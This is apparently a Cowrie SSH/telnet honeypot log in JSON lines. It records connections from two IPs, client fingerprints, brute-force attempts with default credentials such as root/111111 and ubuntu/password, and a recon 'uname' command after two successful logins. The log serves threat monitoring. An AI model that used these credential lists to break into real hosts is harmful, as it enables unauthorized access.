{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:37:54.666538Z","src_ip":"212.227.125.160","session":"bc2262f1d601"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:37:59.917008Z","src_ip":"212.227.235.229","session":"4416e957f909"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:37:59.917918Z","src_ip":"212.227.235.229","session":"4416e957f909"}
{"eventid":"cowrie.session.closed","duration":12.76686978340149,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:38:04.113473Z","src_ip":"212.227.235.229","session":"95eb41f1447a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40986,"dst_ip":"1.2.3.4","dst_port":23,"session":"a85f184186aa","protocol":"telnet","message":"New connection: 212.227.235.229:40986 (1.2.3.4:23) [session: a85f184186aa]","sensor":"my-vps","timestamp":"2025-08-31T06:38:04.399889Z"}
{"eventid":"cowrie.login.success","username":"root","password":"111111","message":"login attempt [root/111111] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:38:09.480053Z","src_ip":"212.227.125.160","session":"61f38fdf5825"}
{"eventid":"cowrie.session.closed","duration":12.715412616729736,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:38:17.115234Z","src_ip":"212.227.235.229","session":"a85f184186aa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41293,"dst_ip":"1.2.3.4","dst_port":23,"session":"69641ba9d780","protocol":"telnet","message":"New connection: 212.227.235.229:41293 (1.2.3.4:23) [session: 69641ba9d780]","sensor":"my-vps","timestamp":"2025-08-31T06:38:17.373617Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38832,"dst_ip":"1.2.3.4","dst_port":22,"session":"b46ff276f86e","protocol":"ssh","message":"New connection: 212.227.235.229:38832 (1.2.3.4:22) [session: b46ff276f86e]","sensor":"my-vps","timestamp":"2025-08-31T06:38:23.516141Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:38:23.518541Z","src_ip":"212.227.235.229","session":"b46ff276f86e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44540,"dst_ip":"1.2.3.4","dst_port":22,"session":"38c10f4951ab","protocol":"ssh","message":"New connection: 212.227.125.160:44540 (1.2.3.4:22) [session: 38c10f4951ab]","sensor":"my-vps","timestamp":"2025-08-31T06:38:23.690184Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:38:23.738022Z","src_ip":"212.227.235.229","session":"b46ff276f86e"}
{"eventid":"cowrie.login.failed","username":"ica","password":"ica123","message":"login attempt [ica/ica123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:38:24.612438Z","src_ip":"212.227.235.229","session":"b46ff276f86e"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:38:25.836187Z","src_ip":"212.227.235.229","session":"b46ff276f86e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59544,"dst_ip":"1.2.3.4","dst_port":22,"session":"a79903156032","protocol":"ssh","message":"New connection: 212.227.235.229:59544 (1.2.3.4:22) [session: a79903156032]","sensor":"my-vps","timestamp":"2025-08-31T06:38:28.505713Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:38:29.175510Z","src_ip":"212.227.235.229","session":"a79903156032"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:38:29.176400Z","src_ip":"212.227.235.229","session":"a79903156032"}
{"eventid":"cowrie.session.closed","duration":12.780690908432007,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:38:30.154238Z","src_ip":"212.227.235.229","session":"69641ba9d780"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41602,"dst_ip":"1.2.3.4","dst_port":23,"session":"c9e0983c111c","protocol":"telnet","message":"New connection: 212.227.235.229:41602 (1.2.3.4:23) [session: c9e0983c111c]","sensor":"my-vps","timestamp":"2025-08-31T06:38:30.375893Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:38:33.779244Z","src_ip":"212.227.125.160","session":"61f38fdf5825"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T06:38:33.779921Z","src_ip":"212.227.125.160","session":"61f38fdf5825"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"password","message":"login attempt [ubuntu/password] failed","sensor":"my-vps","timestamp":"2025-08-31T06:38:35.007880Z","src_ip":"212.227.235.229","session":"a79903156032"}
{"eventid":"cowrie.login.success","username":"root","password":"111111","message":"login attempt [root/111111] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:38:36.167266Z","src_ip":"212.227.235.229","session":"4416e957f909"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:38:37.112468Z","src_ip":"212.227.235.229","session":"a79903156032"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33120,"dst_ip":"1.2.3.4","dst_port":22,"session":"4090fef697b8","protocol":"ssh","message":"New connection: 212.227.235.229:33120 (1.2.3.4:22) [session: 4090fef697b8]","sensor":"my-vps","timestamp":"2025-08-31T06:38:41.724033Z"}
{"eventid":"cowrie.session.closed","duration":12.748997688293457,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:38:43.124821Z","src_ip":"212.227.235.229","session":"c9e0983c111c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41918,"dst_ip":"1.2.3.4","dst_port":23,"session":"1c997b4abda0","protocol":"telnet","message":"New connection: 212.227.235.229:41918 (1.2.3.4:23) [session: 1c997b4abda0]","sensor":"my-vps","timestamp":"2025-08-31T06:38:43.368118Z"}
{"eventid":"cowrie.session.closed","duration":"20.7","message":"Connection lost after 20.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:38:44.349246Z","src_ip":"212.227.125.160","session":"38c10f4951ab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49362,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f52a19a2395","protocol":"ssh","message":"New connection: 212.227.125.160:49362 (1.2.3.4:22) [session: 2f52a19a2395]","sensor":"my-vps","timestamp":"2025-08-31T06:38:49.395203Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:38:50.078870Z","src_ip":"212.227.125.160","session":"2f52a19a2395"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:38:50.079648Z","src_ip":"212.227.125.160","session":"2f52a19a2395"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"password","message":"login attempt [ubuntu/password] failed","sensor":"my-vps","timestamp":"2025-08-31T06:38:52.268253Z","src_ip":"212.227.125.160","session":"2f52a19a2395"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:38:53.598591Z","src_ip":"212.227.125.160","session":"2f52a19a2395"}
{"eventid":"cowrie.session.closed","duration":12.77543830871582,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:38:56.143379Z","src_ip":"212.227.235.229","session":"1c997b4abda0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42227,"dst_ip":"1.2.3.4","dst_port":23,"session":"24e2125a1efb","protocol":"telnet","message":"New connection: 212.227.235.229:42227 (1.2.3.4:23) [session: 24e2125a1efb]","sensor":"my-vps","timestamp":"2025-08-31T06:38:56.377133Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"23.9","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 23.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:38:57.672988Z","src_ip":"212.227.125.160","session":"61f38fdf5825"}
{"eventid":"cowrie.session.closed","duration":"103.0","message":"Connection lost after 103.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:38:57.926874Z","src_ip":"212.227.125.160","session":"61f38fdf5825"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47206,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e0efff86d39","protocol":"ssh","message":"New connection: 212.227.235.229:47206 (1.2.3.4:22) [session: 7e0efff86d39]","sensor":"my-vps","timestamp":"2025-08-31T06:39:01.105673Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:39:01.116080Z","src_ip":"212.227.235.229","session":"7e0efff86d39"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:39:01.955716Z","src_ip":"212.227.235.229","session":"7e0efff86d39"}
{"eventid":"cowrie.session.closed","duration":"25.1","message":"Connection lost after 25.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:39:06.794612Z","src_ip":"212.227.235.229","session":"4090fef697b8"}
{"eventid":"cowrie.session.closed","duration":12.71284818649292,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:39:09.089891Z","src_ip":"212.227.235.229","session":"24e2125a1efb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42540,"dst_ip":"1.2.3.4","dst_port":23,"session":"9ae5fcfe8899","protocol":"telnet","message":"New connection: 212.227.235.229:42540 (1.2.3.4:23) [session: 9ae5fcfe8899]","sensor":"my-vps","timestamp":"2025-08-31T06:39:09.365041Z"}
{"eventid":"cowrie.login.failed","username":"sas","password":"sas","message":"login attempt [sas/sas] failed","sensor":"my-vps","timestamp":"2025-08-31T06:39:10.886233Z","src_ip":"212.227.235.229","session":"7e0efff86d39"}
{"eventid":"cowrie.session.closed","duration":"11.0","message":"Connection lost after 11.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:39:12.066069Z","src_ip":"212.227.235.229","session":"7e0efff86d39"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62425,"dst_ip":"1.2.3.4","dst_port":22,"session":"47013eb5fb55","protocol":"ssh","message":"New connection: 212.227.235.229:62425 (1.2.3.4:22) [session: 47013eb5fb55]","sensor":"my-vps","timestamp":"2025-08-31T06:39:20.313155Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T06:39:20.314091Z","src_ip":"212.227.235.229","session":"47013eb5fb55"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T06:39:20.442780Z","src_ip":"212.227.235.229","session":"47013eb5fb55"}
{"eventid":"cowrie.login.failed","username":"cedric","password":"cedric","message":"login attempt [cedric/cedric] failed","sensor":"my-vps","timestamp":"2025-08-31T06:39:21.039371Z","src_ip":"212.227.235.229","session":"47013eb5fb55"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:39:21.244629Z","src_ip":"212.227.235.229","session":"4416e957f909"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T06:39:21.245485Z","src_ip":"212.227.235.229","session":"4416e957f909"}
{"eventid":"cowrie.session.closed","duration":12.715994596481323,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:39:22.080967Z","src_ip":"212.227.235.229","session":"9ae5fcfe8899"}
{"eventid":"cowrie.login.failed","username":"cedric","password":"cedric1","message":"login attempt [cedric/cedric1] failed","sensor":"my-vps","timestamp":"2025-08-31T06:39:22.171592Z","src_ip":"212.227.235.229","session":"47013eb5fb55"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42846,"dst_ip":"1.2.3.4","dst_port":23,"session":"fe5bbfd0b4bb","protocol":"telnet","message":"New connection: 212.227.235.229:42846 (1.2.3.4:23) [session: fe5bbfd0b4bb]","sensor":"my-vps","timestamp":"2025-08-31T06:39:22.353551Z"}
{"eventid":"cowrie.login.failed","username":"cedric","password":"cedric123","message":"login attempt [cedric/cedric123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:39:23.302595Z","src_ip":"212.227.235.229","session":"47013eb5fb55"}
{"eventid":"cowrie.login.failed","username":"cedric","password":"cedric1234","message":"login attempt [cedric/cedric1234] failed","sensor":"my-vps","timestamp":"2025-08-31T06:39:24.434157Z","src_ip":"212.227.235.229","session":"47013eb5fb55"}
{"eventid":"cowrie.login.failed","username":"cedric","password":"cedric12345","message":"login attempt [cedric/cedric12345] failed","sensor":"my-vps","timestamp":"2025-08-31T06:39:25.565026Z","src_ip":"212.227.235.229","session":"47013eb5fb55"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:39:26.698886Z","src_ip":"212.227.235.229","session":"47013eb5fb55"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37748,"dst_ip":"1.2.3.4","dst_port":22,"session":"2683d92628a0","protocol":"ssh","message":"New connection: 212.227.235.229:37748 (1.2.3.4:22) [session: 2683d92628a0]","sensor":"my-vps","timestamp":"2025-08-31T06:39:27.411224Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:39:28.125762Z","src_ip":"212.227.235.229","session":"2683d92628a0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:39:28.126695Z","src_ip":"212.227.235.229","session":"2683d92628a0"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"password1","message":"login attempt [ubuntu/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T06:39:33.821550Z","src_ip":"212.227.235.229","session":"2683d92628a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57384,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9a594c68634","protocol":"ssh","message":"New connection: 212.227.125.160:57384 (1.2.3.4:22) [session: e9a594c68634]","sensor":"my-vps","timestamp":"2025-08-31T06:39:34.424337Z"}
{"eventid":"cowrie.session.closed","duration":12.756290435791016,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:39:35.109767Z","src_ip":"212.227.235.229","session":"fe5bbfd0b4bb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43151,"dst_ip":"1.2.3.4","dst_port":23,"session":"7dfa7ef263c5","protocol":"telnet","message":"New connection: 212.227.235.229:43151 (1.2.3.4:23) [session: 7dfa7ef263c5]","sensor":"my-vps","timestamp":"2025-08-31T06:39:35.383748Z"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:39:35.715997Z","src_ip":"212.227.235.229","session":"2683d92628a0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"17.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 17.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:39:38.403230Z","src_ip":"212.227.235.229","session":"4416e957f909"}
{"eventid":"cowrie.session.closed","duration":"106.3","message":"Connection lost after 106.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:39:38.404366Z","src_ip":"212.227.235.229","session":"4416e957f909"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51645,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5aa40faa246","protocol":"ssh","message":"New connection: 212.227.235.229:51645 (1.2.3.4:22) [session: e5aa40faa246]","sensor":"my-vps","timestamp":"2025-08-31T06:39:40.073411Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:39:40.075050Z","src_ip":"212.227.235.229","session":"e5aa40faa246"}
